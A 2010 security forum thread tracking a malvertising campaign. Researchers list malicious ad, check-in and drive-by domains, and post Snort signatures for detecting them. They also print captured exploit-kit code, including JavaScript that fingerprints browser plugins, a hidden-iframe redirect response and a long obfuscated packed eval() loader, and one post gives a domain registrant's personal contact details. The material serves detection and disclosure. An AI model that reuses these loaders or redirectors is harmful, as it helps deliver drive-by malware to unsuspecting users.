ArzkSIRRKYQ/EXP=1274719393/A=1757979682871089560/R=0/X=2/SIG=12t964gb2/*http://ad
net.media.unwited.com/cr/j/clk/?rt=47210&sid=2421828&m=5171&ts=31&d=x&ctc=31&tm=s
c\" target=\"_top\">\u000d\u000d<img src=\"http://adnet.media.unwited.com/cr/j/vi
ew/?rt=47210&sid=2421828&m=5171&ts=31&d=x&ctc=31&tm=sc\" width=728 height=90 bord
er=0>\u000d\u000d</a>\u000d\u000d</noscript><img style=\"display:none\" width=0 h
eight=0 alt=\"\" src=\"http://us.bc.yahoo.com/b?P=ae0af71a-6742-11df-bf5f-bf408f6
06688&T=19c202ntl%2fX%3d1274712193%2fE%3d2022775850%2fR%3dncnws%2fK%3d5%2fV%3d8.1
%2fW%3d0%2fY%3dPARTNER_US%2fF%3d293944772%2fH%3dYWx0c3BpZD0iOTY3MjgzMTUxIiBzZXJ2Z
UlkPSJhZTBhZjcxYS02NzQyLTExZGYtYmY1Zi1iZjQwOGY2MDY2ODgiIHNpdGVJZD0iODI4NTUxIiB0U3
RtcD0iMTI3NDcxMjE5Mjk4NTUwMiIgdGFyZ2V0PSJfYmxhbmsiIA--%2fQ%3d-1%2fS%3d1%2fJ%3d295
58862&U=13raiokei%2fN%3dj7RSIkwNiZE-%2fC%3d600742873.600772841.409311541.40834757
2%2fD%3dN%2fB%3d1757979682871089560%2fV%3d2\"><!--flv has invalid value--><!--rTg
has invalid value--><!--rTg has invalid value--><!--MME--><!--TRK:a:175797968287
1089560,m:600742873.600772841.409311541.408347572-->",
"type":"text/html",
"id":"1",
"size":["728x90"],
"slug":false,
"secure":false},
-
nertonic.com
Drive by:
http://nertonic.com/9bc16b427vc52/
PDF:
http://nertonic.com/657fs76fg87vc9/840099943
http://wepawet.iseclab.org/view.php?hash=744420e7136af84acdcbb12dd970b188&type=js
Java:
http://nertonic.com/657fs76fg87vc9/B0.php
Payload:
http://nertonic.com//657fs76fg87vc9/6875643787820
Detected as Win32/Fainli.A by Microsoft Security Essentials
Check-in post infection:
antispyware-scan.com
antispyware-scan.net
Getting referred to by ad.doubleclick.net
-
FYI, this is still running pretty rampant
Because you still can't be bothered to send the details to the right people that's what happens rodeo guy.
YOU could have helped to stop this a lot earlier, instead you just want to keep playing your little games.
-
FYI, I know that Dshield is part of SANS and FYI we got their blocklist available for download at Bluetack.
Microsoft still has NO information from SANS or Dshield, as reported by my contacts at AdCenter / Traffic Quality Team. Just FYI, they found several other malvertisement campaigns even with the few details I was able to provide because you wanted to play the smart way.
http://stopmalvertising.com/malvertisements/alert-new-curves-malvertisement
And NO, I don't hand out my contacts from Microsoft AdCenter, Yahoo or Google / Doubleclick to rodeo kids.
You had the elements in hand to stop these campaigns but they are still running and even more malvertisement domains have been discovered.
http://msmvps.com/blogs/spywaresucks/archive/2010/05/30/1770473.aspx
Happy now ?
-
I've alerted my contact at Yahoo about the adnet.media.unwited.com incident. Which site is that malvertisement displayed or is that again top secret too?
-
Yahoo, without any pertinent information again, took out 3 malvertisements. There might be more ....
-
And NO, I don't hand out my contacts from Microsoft AdCenter, Yahoo or Google / Doubleclick to rodeo kids.
Good for you, then keep helping the bad guys out.
Additionally if you have nothing to actually contribute to the thread that is pertinent, it is best to stay out of it.
Yahoo, without any pertinent information again, took out 3 malvertisements. There might be more ....
Then they obviously haven't taken any time to read what I post in public or bothered to contact me. I've got a bunch more, but I think I'll stop publishing that we find it and keep it to ourselves.
-
For over the last 4-5 years I've spend most of my time if not all on reporting malware.
Actually FYI, Yahoo / Right Media took out more since my last post as I have been continously in contact with the incident team. I have the exact number of incidents which I can't disclose in public unfortunately.
Good for you, then keep helping the bad guys out.
Yeah, sure .... that's exactly what you're doing by sending the information to the wrong people and blaming me for it. Keep doing what you do and we'll see how fast something gets pulled out of an ads network.
We see guys like you all the time ... showboat poney's ...
-
For over the last 4-5 years I've spend most of my time if not all on reporting malware.
And maybe in those multiple years you would realize that shoving copies of PCAPs around to random people on web forums can lead to termination and prosecution for violating all the security controls we have to comply with under FISMA. I'm not sending you my clients pcaps regardless, so stop asking.
-
For over the last 4-5 years I've spend most of my time if not all on reporting malware.
And maybe in those multiple years you would realize that shoving copies of PCAPs around to random people on web forums can lead to termination and prosecution for violating all the security controls we have to comply with under FISMA. I'm not sending you my clients pcaps regardless, so stop asking.
hi Kimberly, hi eoin,
please slow down a bit .... both sidess.... publishing pcaps in public is bad... but i guess kimberly made a mistake...
-- gerhard
-
FYI, this is still running pretty rampant
Because you still can't be bothered to send the details to the right people that's what happens rodeo guy.
YOU could have helped to stop this a lot earlier, instead you just want to keep playing your little games.
Yea, it is not the lack of proper vetting within the business process of adding new advertising affiliates. Well, that and a complete lack of major advertising organizations following their own redirects to their affiliates constantly to observe if they are serving up malware and drive bys.
It isn't like we aren't sharing a common goal, but apparently by producing to the community what is going on without risking the data of my clients, or my own job, makes you somehow blame me for the malvertising campaigns I take the time to research and disclose. All the while you continiously refuse to provide any channels or contacts that you claim to know exist to report this information to directly. The both of you completely lack the understanding of what is required to disclose traffic from my client to any other organization.
Thats as nice as I am going to put it. Stay out of the thread unless you have actual pertinent information regarding domains to be added to the list. If you have some more personally oriented snipes to try and send, take it to PM. That is why it is there.
-
publishing pcaps in public is bad... but i guess kimberly made a mistake...
I didn't post a complete capture including affiliate ID's in this topic ....
BTW, you can strip out confidential information about websites and or clients, just leaving in the necessary info to identify the malicious ad before handing them over to anyone, that includes official institutions or advertising networks.
-
publishing pcaps in public is bad... but i guess kimberly made a mistake...
I didn't post a complete capture including affiliate ID's in this topic ....
BTW, you can strip out confidential information about websites and or clients, just leaving in the necessary info to identify the malicious ad before handing them over to anyone, that includes official institutions or advertising networks.
Affiliate ID's and domains don't matter to my client, data being POST'd back to servers after exploitation does. I post the affiliate ID's and domains so that they will become known and public so people can block them as we do. I will not be disclosing full PCAPs of my client to you so stop bringing it up.
Is this seriously the type of conduct that is deemed accecptable on this board?
-
Can we all calm down and put this issue to rest please. I won't allow this behaviour to continue.
We're all on the same side here and meant too be helping each other take the bad guys down. If someone doesn't wish to share contacts or data then fine, that is up to them (and as far as pcaps, most corps don't allow those to be shared publicly, or indeed privately, for obvious security reasons, stripped out or otherwise), just contact me and I'll help find the appropriate contact for you.
-
thanks to Steve for mediating this. agreed that we are all on the same team here.
-
More drive bys:
hgptd.com
http://hgptd.com/g/index.php
Redirected from:
zherlova1388.newmail.ru/ypypumu.html
puaho.notlong.com
graudin4.nm.ru/ixywesuw.html
dolieb.notlong.com
-
More redirects to the baddie domains:
http://ir.pe/2c3o
**EDIT**
Apparently this ir.pe is just some sort of URL redirection service in spanish.
-
More still ongoing:
Ad servers:
view.atdmt.com.daxitymb.com
media.fastclick.net.tribudd.com
view.atdmt.com.cidersi.com
ad.doubleclick.net.wifell.com
adnet.media.intati.com
Seeing most of the ad services over in the 95.143.193.0/24 net now. Still redirecting clients to the known bad networks full of drive bys.
Those above malvertising domains will toss you to a stats/check in site:
Check in for stats tracking:
http://generalline.co.cc/rss.php?n=cust11
Eventutally redirects you over to the actual drive by (we are supposing here as we block the destination nets on our networks):
Drive bys examples:
http://uprtx.com/rbds/mh_t.php
-
if this campaign follows patterns displayed by the last campaign the next exploit domains will be:
Hjoty.com
Bumzc.com
Potyur.com
Palcaug.com
Uoptyr.com
Uprtx.com
-
Been working on a Snort sig to track the big malvertising campaigns responsible for most of our favorite FakeAV installs. The servers return a common form of JavaScript ompression commonly used by jquery and also used by Google and others. Luckily, the servers from google and others are not normally ngix and the ones that are ngix are serving up the javascript with the correct Content-Type instead of text/html. So based on that we created this sig and have had a pretty low FP rate for the
last day or so that has helped us identify the malvertising servers and add them to the egress filters.
alert tcp $EXTERNAL_NET $HTTP_PORTS -> $HOME_NET any (msg:"MALVERTISING eval(function(p,a,c,k,e,d) JavaScript from ngix Detected"; flow:established,to_client; content:"Server\: nginx"; nocase; offset:15; depth:15; content:"Content-Type\: text/html"; nocase; distance:20; content:"eval(function(p,a,c,k,e,d)"; nocase; distance:50; classtype:bad-unknown; sid:5600046; rev:1;)
Sample packet payload:
00000245 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d HTTP/1.1 200 OK.
00000255 0a 53 65 72 76 65 72 3a 20 6e 67 69 6e 78 2f 30 .Server: nginx/0
00000265 2e 37 2e 36 35 0d 0a 44 61 74 65 3a 20 4d 6f 6e .7.65..D ate: Mon
00000275 2c 20 32 31 20 4a 75 6e 20 32 30 31 30 20 31 33 , 21 Jun 2010 13
00000285 3a 32 39 3a 34 35 20 47 4d 54 0d 0a 43 6f 6e 74 :29:45 G MT..Cont
00000295 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 ent-Type : text/h
000002A5 74 6d 6c 0d 0a 54 72 61 6e 73 66 65 72 2d 45 6e tml..Tra nsfer-En
000002B5 63 6f 64 69 6e 67 3a 20 63 68 75 6e 6b 65 64 0d coding: chunked.
000002C5 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 6b 65 65 .Connect ion: kee
000002D5 70 2d 61 6c 69 76 65 0d 0a 58 2d 50 6f 77 65 72 p-alive. .X-Power
000002E5 65 64 2d 42 79 3a 20 50 48 50 2f 35 2e 32 2e 31 ed-By: P HP/5.2.1
000002F5 33 0d 0a 0d 0a 66 37 32 0d 0a 65 76 61 6c 28 66 3....f72 ..eval(f
00000305 75 6e 63 74 69 6f 6e 28 70 2c 61 2c 63 2c 6b 2c unction( p,a,c,k,
00000315 65 2c 64 29 7b 65 3d 66 75 6e 63 74 69 6f 6e 28 e,d){e=f unction(
00000325 63 29 7b 72 65 74 75 72 6e 28 63 3c 61 3f 27 27 c){retur n(c<a?''
00000335 3a 65 28 70 61 72 73 65 49 6e 74 28 63 2f 61 29 :e(parse Int(c/a)
00000345 29 29 2b 28 28 63 3d 63 25 61 29 3e 33 35 3f 53 ))+((c=c %a)>35?S
00000355 74 72 69 6e 67 2e 66 72 6f 6d 43 68 61 72 43 6f tring.fr omCharCo
00000365 64 65 28 63 2b 32 39 29 3a 63 2e 74 6f 53 74 72 de(c+29) :c.toStr
00000375 69 6e 67 28 33 36 29 29 7d 3b 69 66 28 21 27 27 ing(36)) };if(!''
00000385 2e 72 65 70 6c 61 63 65 28 2f 5e 2f 2c 53 74 72 .replace (/^/,Str
00000395 69 6e 67 29 29 7b 77 68 69 6c 65 28 63 2d 2d 29 ing)){wh ile(c--)
000003A5 7b 64 5b 65 28 63 29 5d 3d 6b 5b 63 5d 7c 7c 65 {d[e(c)] =k[c]||e
000003B5 28 63 29 7d 6b 3d 5b 66 75 6e 63 74 69 6f 6e 28 (c)}k=[f unction(
000003C5 65 29 7b 72 65 74 75 72 6e 20 64 5b 65 5d 7d 5d e){retur n d[e]}]
Submitted it over to the guys over at ET (EmergingThreats) so it may be in future releases if it is deemed worthy.
-
if this campaign follows patterns displayed by the last campaign the next exploit domains will be:
Hjoty.com
Bumzc.com
Potyur.com
Palcaug.com
Uoptyr.com
Uprtx.com
Definately, the all resolve to be within the 194.8.250.0/24 netblock. The drive by domains will flip around inside that netblock every couple of weeks or so.
Some of the other check-in sites for stats are:
jahsgdqtuz.co.cc
generalline.co.cc
New malvertising sites:
view.atdmt.com.landsm.com
media.rseeting.com
New payload/malware sites:
http://nwsplt.com/pqmmh/_dwfxw.php
***EDIT***
Looks like if the URL has already been visited, it redirects the client to Google.com based upon if the client IP has already made the request before.
-
Eoin, thanks for keeping us all up to date on this and putting together a snort sig to detect these campaigns.
the earlier campaign hosts what appears to be SEO Sploit packs on 194.8.250.60.
this most recent outbreak is also hosting what appear to be SEO Sploit packs on 194.8.250.15.
All the exploit domains in both campaigns are registered to:
Pat Casey
patcasey@xhotmail.com
+1.7149214718
fax: +1.7149214718
1201 E. Candlewood
Orange CA 92867
us
Ive observed a cocktail of Bamital, TDSS, and Rogue AV dropped during these campaigns.
-
Just trying to give as much as I get from everyone else who contributes! :)
Check-in:
webclickst.co.cc
Drive-by:
fjoty.com
Malicious PDF:
http://fjoty.com/pw/hxnrgy/ghyv.pdf
Keep seeing the URL's rotate, might be time based?
http://fjoty.com/jz/cvra.php
http://fjoty.com/pw/za_pumsvx.php
When you load the page the first time, you get this back:
<html>
<body>
<script>
document.write('<form action="za_pumsvx.php" method="post"><input type="hidden" name="id" value="" />');
var id="adbac98ea8cc4816ae7652f9ade94ac6&n";
if(navigator.javaEnabled())
{
id="adbac98ea8cc4816ae7652f9ade94ac6&j";
}
for(var i=0;i<navigator.plugins.length;i++)
{
if(navigator.plugins[i].description.indexOf("Adobe Acrobat")!=-1)
{
id=id+"p";
break;
}
if(navigator.plugins[i].description.indexOf("Adobe PDF")!=-1)
{
id=id+"p";
break;
}
}
var f=document.forms[0];
f.id.value=id;
f.submit();
</script>
</body>
</html>
It enumerates the browser plugins and POST's back that info to the server which picks the exploit to serve up. So you would have a POST like this coming back from the client after executing the above JavaScript:
POST /pw/za_pumsvx.php HTTP/1.1
Host: fjoty.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://fjoty.com/pw/za_pumsvx.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 40
id=adbac98ea8cc4816ae7652f9ade94ac6%26np
I am going to try and get some more traffic from this and see how easy it may be to sig the POST from the client. The id= sticks out pretty easy, I just dont think it is consistant becuase the server appears to go off of the length of the random string to determine which exploits to serve up. Should be able to sig it with a little regex though.
***EDIT***
Here is a rough Snort sig with minimal testing for clients POST'ing to the SEO Exploit kits to get themselves some malicious Java or PDF's:
alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"MALVERTISING POST to SEO Exploit Kit"; flow:established,to_server; content:"POST "; depth:5; nocase; content:".php HTTP"; nocase; distance:0; pcre:"/id=[a-f0-9]{32}(&|%26)(np|jp|n|j)/iR"; classtype:bad-unknown; sid:5600047; rev:2;)
This should help track people who have been exploited by the PDF from the drive by:
alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"MALVERTISING Adobe Exploited Check-In"; flow:established,to_server; content:"GET "; nocase; depth:4; uricontent:".php?&&reader_version="; nocase; classtype:trojan-activity; sid:5600048; rev:1;)
Sig developted from the following wepawet report:
http://wepawet.iseclab.org/view.php?hash=a47d8bc28e859963220c777818a938a1&type=js
-
Exploit domain of the day:
fruuf.com
-
Domains recap for the last few weeks.
Malvertising Domains (Serve up Obfuscated JavaScript that redirects to check-in sites):
a123.g.doxoni.com
a123.g.honettee.com
a123.g.manilis.com
a123.g.ophori.com
a123.g.rogloard.com
ad.doubleclick.net.leastive.com
ad.doubleclick.net.mattoft.com
ad.doubleclick.net.wifell.com
ad.view.expiage.com
adnet.media.intati.com
epholo.com
h7.ch.adtech.com.niklip.com
mattoft.com
media.fastclick.net.tribudd.com
media.fastclick.net.wifell.com
media.mattoft.com
media.rseeting.com
media.torpalis.com
rismit.com
sconect.com
view.atdmt.com.cidersi.com
view.atdmt.com.daxitymb.com
view.atdmt.com.landsm.com
view.j9.atlassolutions.com.xbevs.com
Check-in sites that redirect to SEO Exploit drive by sites:
canteeve.com
deltastats0.co.cc
dmset.co.cc
fastclick01.co.cc
generalline.co.cc
generalline.co.cc
getazxvision.co.cc
globalmicro.co.cc
hlrotio.co.cc
jahsgdqtuz.co.cc
linestreams.co.cc
mediaclickz.co.cc
mediafasts.co.cc
microjet.co.cc
microtrendsa.co.cc
neoplezas.co.cc
neotrapis.co.cc
orionst11.co.cc
securetrend.co.cc
sigmapopts.co.cc
statstoplex.co.cc
stcorp-as.co.cc
totaltrends.co.cc
weatherspacex.co.cc
webcharterw.co.cc
webclickst.co.cc
SEO Exploit drive by sites:
aiosstatsungenett.com
bumzc.com
chiklomba.com
fjoty.com
fnmaw.com
fruuf.com
ghutren.com
google.analytics.com.xygppovpmbh.info
google.analytics.com.qapvjonkksh.info
hjoty.com
kirtunmil.com
ljutrum.com
palcaug.com
potyur.com
preteritness.com
qtulina.com
retykub.com
sertgukl.com
statsianighteworkes.com
potyur.com
tjerhan.com
ttyur.com
unastatiomask.com
uoptyr.com
uprtx.com
www.obsidallynd.com
Domains referring clients to the malicious advertising services:
1077theend.com
1077thelake.com
3rdnewhampshire.webs.com
.997kiss.com
997kiss.com
a123.g.honettee.com
a123.g.rogloard.com
actionsportsblips.dailyradar.com
ad.ca.doubleclick.net
ad.doubleclick.net
ad.wikinvest.com
aetv.com
a.farlex.com
amertribes.proboards.com
angelmariem.webs.com
anorak.co.uk
arts.nationalpost.com
ashraf786.proboards.com
associatedcontent.com
audioreview.com
ballhype.com
bdv.bidvertiser.com
bemidjitakeakidfishing.webs.com
biography.com
calgaryherald.com
canada.com
cantonveterinaryhospital.webs.com
carnivoraforum.com
carreview.com
cheaptickets.com
classifieds.mtbr.com
classifieds.outdoorreview.com
combineforums.proboards.com
community.history.com
content.mtbr.com
countryblips.dailyradar.com
courses.golfreview.com
crosstieentertainment.webs.com
dailymail.co.uk
dailyradar.com
daysblips.dailyradar.com
designsbyanna.webs.com
detroit4lyfe.com
dreamriverstables.webs.com
dynamic.nasdaq.com
eagleridgervpark.webs.com
earthblips.dailyradar.com
edmontonjournal.com
faceoff.com
financialpost.com
fixya.com
forums.golfreview.com
forums.mtbr.com
forums.outdoorreview.com
forums.roadbikereview.com
froggy101.com
gallery.mtbr.com
gallery.photographyreview.com
gallery.roadbikereview.com
garagejournal.com
geekblips.dailyradar.com
.glam.com
golfreview.com
google.com
gscnccampstaffalumni.webs.com
habsinsideout.com
hair2dye4salon.com
history.com
hodagbassmasters.webs.com
hotfrog.com
ibiker.proboards.com
idiomproductions.webs.com
intellicast.com
kmbz.com
kossan.se
lablips.dailyradar.com
life.nationalpost.com
live.nationalpost.com
lolblips.dailyradar.com
lovingrats.webs.com
manitoudays.webs.com
maximumitblips.dailyradar.com
mediablips.dailyradar.com
members.webs.com
mentalfloss.com
mhsfashion.webs.com
missblackinternational.webs.com
mommyblips.com
montrealgazette.com
movieblips.dailyradar.com
mtbr.com
musicblips.dailyradar.com
n.admagnet.net
naruto-manga-spoiler.com
nasdaq.com
newrock933.com
news.nationalpost.com
newyorkblips.dailyradar.com
orbitz.com
outdoorreview.com
pchardwareblips.dailyradar.com
pgproductionsvocalstudio.webs.com
photoblips.dailyradar.com
photographyreview.com
plugins.wikinvest.com
pnta.proboards.com
process.advertangel.com
quotes.nasdaq.com
rapturefightclan.webs.com
reviews.carreview.com
reviews.mtbr.com
reviews.photographyreview.com
reviews.roadbikereview.com
revolverblips.dailyradar.com
rlslog.net
roadbikereview.com
scienceblips.dailyradar.com
showhype.com
shrinkingjeans.net
slacker.com
slitherbriggs.webs.com
soft-4all.com
sportsfanlive.com
sports.nationalpost.com
starzband.webs.com
svc1.m5prod.net
syndication.adagora.com
tampaspinsweather.webs.com
tennessean.com
theofficeblips.dailyradar.com
thesky973.com
thestarphoenix.com
throttleblips.dailyradar.com
timeaftertimeonlinedrama.webs.com
timescolonist.com
trails.mtbr.com
tvblips.dailyradar.com
usatoday.com
vancouversun.com
waitingfornextyear.com
wallstreetblips.dailyradar.com
webcache.googleusercontent.com
webs.com
wgr550.com
windsorstar.com
worldofsnails.webs.com
wrestlingblips.dailyradar.com
wrko.com
wwl.com
-
This Snort sig helps tracking the new drive by domains quite effectively:
alert TCP $EXTERNAL_NET $HTTP_PORTS -> $HOME_NET any (msg:"MALVERTISING hidden iframe served by ngix"; flow:established,to_client; content:"Server\: nginx"; nocase; offset:15; depth:15; content:"<iframe src="; content:"style=\"visibility\:hidden\;\" width=\"1\" height=\"1\"></iframe>"; classtype:bad-unknown; sid:5600049; rev:1;)
Server response signature was developed from:
HTTP/1.1 200 OK
Server: nginx/0.7.65
Date: Thu, 24 Jun 2010 00:35:38 GMT
Content-Type: text/html
Connection: keep-alive
X-Powered-By: PHP/5.2.13
Content-Length: 137
<html>
<body>
<iframe src="http://fjoty.com/pw/za_pumsvx.php" style="visibility:hidden;" width="1" height="1"></iframe>
</body>
</html>
False positives have been non-existant so far for the past few hours.
-
Malvertising Servers:
view.atdmt.com.requild.com
Check-in/Redirectors:
trendanalytics2010.co.cc
vcztuokghrtq.co.cc
New drive-bys (change/rotate every 24 hours or so):
http://uytim.com/vz/tbbncwdv_.php - Saturday
http://kobqq.com/vc/vcc_vdz.php - Sunday
http://yopte.com/zs/bzkvfl.php - Monday (Today)
http://yopte.com/wb/adbplhr.php
More info:
Drive bys are single shot based on source IP (then they redirect to google.com on subsequent visits, even after a domain name change). Also, the JavaScript is broken and will not execute in IE8 unless you are using compatibility mode.
-
Nice catch :)
/edit
Do you have the full URL for vcztuokghrtq.co.cc please? (doesn't resolve here, and nothing on the search engines for it)
/edit 2
And this one please;
view.atdmt.com.requild.com
-
Yes indeed, here ya go.
Nice catch :)
/edit
Do you have the full URL for vcztuokghrtq.co.cc please? (doesn't resolve here, and nothing on the search engines for it)
URL: http://vcztuokghrtq.co.cc/north.php?n=cust12
Referrer: http://www.fixya.com/support/p1133609-orange_steelcore_9_surfboard_lock_snowb
Response:
HTTP/1.1 200 OK
Server: nginx/0.7.65
Date: Sun, 27 Jun 2010 <REMOVED>
Content-Type: text/html
Connection: keep-alive
X-Powered-By: PHP/5.2.13
Content-Length: 135
<html>
<body>
<iframe src="http://kobqq.com/vc/vcc_vdz.php" style="visibility:hidden;" width="1" height="1"></iframe>
</body>
</html>
And this one please;
view.atdmt.com.requild.com
URL: http://view.atdmt.com.requild.com/MON/jview/dlnkkmgr124536131mon/direct/01/?rn=11386816&click=
Referrer: http://mac.softpedia.com/get/Math-Scientific/Best-Pair-II.shtml
-
New stuff for today:
Malvertising:
http://js.zedo.com.rc1.hiskweb.com/cr/j/cd/?rt=47210&sid=223417424&m=5171&ts=31&d=x&ctc=31&tm=sc
Redirect:
http://globalsearch5.co.cc/amiga.php?n=cust12
Exploit:
http://nhytx.com/wt/_duusz.php
-
Cheers :)
-
Do I need a special referer for
js.zedo.com.rc1.hiskweb.com/cr/j/cd/?rt=47210&sid=223417424&m=5171&ts=31&d=x&ctc=31&tm=sc
??
Script decodes to
<a href='http://www.raffaello-network.com/' target='_blank'><img src='http://js.zedo.com.rc1.hiskweb.com/banners/load.php?id=223417424' border='0' ></a>
Do you find more ?
-
The obfuscated code I have from pcap from the js.zedo.com.rc1.hiskweb.com is as follows:
eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--){d[e(c)]=k[c]||e(c)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('5 3M={5f:q(m,e,n){m=12.3F(m);5 R=[],M=\'\';x(5 i=0;i<m.j;i+=3){5 11=\'1\';x(5 h=0;h<3;h++){v(i+h<m.j){N=8.o(m.f(i+h))-30;v(N.j<2)N=\'0\'+N}3K 5a;11+=N}R.2t(11+\'1\')}x(5 k=0;k<R.j;k++){5 P=8.13(R[k],e,n);5 L=P.X(16);V(L.j<7)L=\'0\'+L;M+=L}M=M.3R(3P 3O(\'^+|+$\',\'g\'),\'\');b 8.2r(M)},3N:q(c,d,n){c=8.2p(c);5 G=[],U=\'\',18=\'\';x(5 i=0;i<c.j;i+=7)G.2t(c.Y(i,7));x(5 u=0;u<G.j;u++)v(G[u]==\'\')G.5b(u,1);x(5 u=0;u<G.j;u++){5 P=8.13(Z(G[u],16),d,n)+\'\';U+=P.Y(1,P.j-2)}x(5 u=0;u<U.j;u+=2)18+=8.a(Z(U.Y(u,2),10)+30);b 12.3Q(18)},o:q(a){b t.o(a)},a:q(2u){b t.a(2u)},17:q(g,l){b g-(l*58.59(g/l))},13:q(2s,14,19){5 W=1,i=0,O=2s;V((14>>i)>0){v(((14>>i)&1)==1)W=8.17((W*O),19);O=8.17((O*O),19);i++}b W},2r:q(B){b B;5 J=\'\';x(5 i=0,Q=B.j;i<Q;i+=2){5 I=Z(\'\'+B.f(i)+B.f(i+1),16).X(10);J+=t.a(I)}b J},2p:q(B){b B;5 J=\'\';x(5 i=0,Q=B.j;i<Q;i++){5 I=t.o(B.f(i)).X(16);J+=I.j==2?I:\'0\'+I}b J}};5 t={F:{3J:{2v:2q,2B:2w,2z:2A,2y:2x,2n:2o,2e:2d,2b:2c,2a:29,2g:2f,2m:2l,2j:2k,2i:2h,2D:2C,2Y:2X,28:2W,2U:2T,31:2Z,35:36,32:34,2S:33,2I:2R,2H:2J,2E:2G,2K:2F,2Q:2L,2O:2P,2N:2M,1M:37,1r:1p,1t:1u,1q:1x,1w:1v,1C:1B,1z:1A,1y:1o,1m:1D,1f:1d,1a:1c,1e:1b,1l:1n,1k:1g,1h:1j,1s:1i,1Y:27,1X:1Z,1U:1W,20:1V,26:21,24:25,1E:22,1T:23,1J:1S,1I:1K,1F:1H,1L:1G,1Q:1R,1N:1P,2V:1O,4v:3c,38:4r,4u:4t,4p:4s,4w:4q,4A:4B,4y:4z,4n:4o,4e:4d,4b:4c,4a:49,4g:4f,4m:4l,4D:4k,4h:4j,4C:4i,4Y:4H,4X:4Z,4U:4W,51:4V,52:55,53:56,50:54,4I:4S,4T:4J,4E:4G,4K:4F,4Q:4L,4P:4R,4M:4O,4x:4N,3t:47,3s:3u,3p:3r,3v:3q,3B:3w,3z:3A,3y:3x,3n:3o,3e:3d,3b:48,3a:39,3g:3f,3m:3l,3j:3k,3i:3h,3D:3C,3Z:3Y,3W:3X,3V:3U,41:40,45:46,42:44,3T:43,3I:3S},3H:{2q:2v,2w:2B,2A:2z,2x:2y,2o:2n,2d:2e,2c:2b,29:2a,2f:2g,2l:2m,2k:2j,2h:2i,2C:2D,2X:2Y,2W:28,2T:2U,2Z:31,36:35,34:32,33:2S,2R:2I,2J:2H,2G:2E,2F:2K,2L:2Q,2P:2O,2M:2N,37:1M,1p:1r,1u:1t,1x:1q,1v:1w,1B:1C,1A:1z,1o:1y,1D:1m,1d:1f,1c:1a,1b:1e,1n:1l,1g:1k,1j:1h,1i:1s,27:1Y,1Z:1X,1W:1U,1V:20,21:26,25:24,22:1E,23:1T,1S:1J,1K:1I,1H:1F,1G:1L,1R:1Q,1P:1N,1O:2V,3c:4v,4r:38,4t:4u,4s:4p,4q:4w,4B:4A,4z:4y,4o:4n,4d:4e,4c:4b,49:4a,4f:4g,4l:4m,4k:4D,4j:4h,4i:4C,4H:4Y,4Z:4X,4W:4U,4V:51,55:52,56:53,54:50,4S:4I,4J:4T,4G:4E,4F:4K,4L:4Q,4R:4P,4O:4M,4N:4x,47:3t,3u:3s,3r:3p,3q:3v,3w:3B,3A:3z,3x:3y,3o:3n,3d:3e,48:3b,39:3a,3f:3g,3l:3m,3k:3j,3h:3i,3C:3D,3Y:3Z,3X:3W,3U:3V,40:41,46:45,44:42,43:3T,3S:3I}},o:q(a,r){r=r||\'3J\';v(!8.F[r])b 3G;a=a.5g(0);b(a 3E 8.F[r])?8.F[r][a]:a},a:q(o,r){r=r||\'3H\';v(!8.F[r])b 3G;o=(o 3E 8.F[r])?8.F[r][o]:o;b 5m.5h(o)}};5 12={w:"5l+/=",3F:q(p){5 s=\'\',H,C,D,K,E,z,y,i=0;V(i<p.j){H=t.o(p.f(i++));C=t.o(p.f(i++));D=t.o(p.f(i++));K=H>>2;E=((H&3)<<4)|(C>>4);z=((C&15)<<2)|(D>>6);y=D&5i;v(3L(C))z=y=S;3K v(3L(D))y=S;s=s+8.w.f(K)+8.w.f(E)+8.w.f(z)+8.w.f(y)}b s},3Q:q(p){5 s=\'\',H,C,D,K,E,z,y,i=0;p=p.3R(3P 3O(\'[^A-5j-5e-9+/=]\',\'g\'),\'\');V(i<p.j){K=8.w.T(p.f(i++));E=8.w.T(p.f(i++));z=8.w.T(p.f(i++));y=8.w.T(p.f(i++));H=(K<<2)|(E>>4);C=((E&15)<<4)|(z>>2);D=((z&3)<<6)|y;s=s+t.a(H);v(z!=S)s=s+t.a(C);v(y!=S)s=s+t.a(D)}b s}};5d(3M.3N(\'57\',\'5c\',\'5k\'));',62,333,'|||||var|||this||chr|return||||charAt||||length|||||ord|input|function|dir|output|ASCII||if|alphabet|for|enc4|enc3||str|chr2|chr3|enc2|translations|decryptarray|chr1|bte|result|enc1|chunk|coded|tmpstr|basepow2|resultmod|len|asci|64|indexOf|deencrypt|while|accum|toString|substr|parseInt||tmpasci|BASE64|powmod|exp|||mod|resultd|modulus|1028|175|170|168|1031|1025|179|1169|184|180|1110|1030|1168|178|163|156|1115|1114|1105|1116|157|159|1119|158|1032|1118|162|161|1038|165|1040|1044|197|196|1043|1042|195|1045|8250|1047|200|199|1046|198|194|1041|1112|189|188|1108|8470|186|1029|190|192|193|1111|191|1109|185|1035|135|8225|8224|134|133|8230|136|8364|139|8249|1033|138|137|8240|8222|132|strhex|128|hexstr|base|push|num|1026|129|131|1107|8218|130|1027|140|1034|8211|151|150|8226|8221|149|8212|152|154|1113|8482|153|65533|148|8220|143|1039|1048|142|141|1036|144||1106|8217|147|146|8216|145|155|1050|242|1090|1089|201|240|1088|243|1091|246|1094|1093|245|244|1092|1087|239|1082|235|234|1081|1080|233|1083|236|238|1086|1085|237|1084|247|1095|in|encode|null|php2js|1103|js2php|else|isNaN|RSA|decrypt|RegExp|new|decode|replace|255|1102|250|1098|1097|249|248|1096|251|1099|1101|254|253|1100|252|232|241|211|1059|1058|210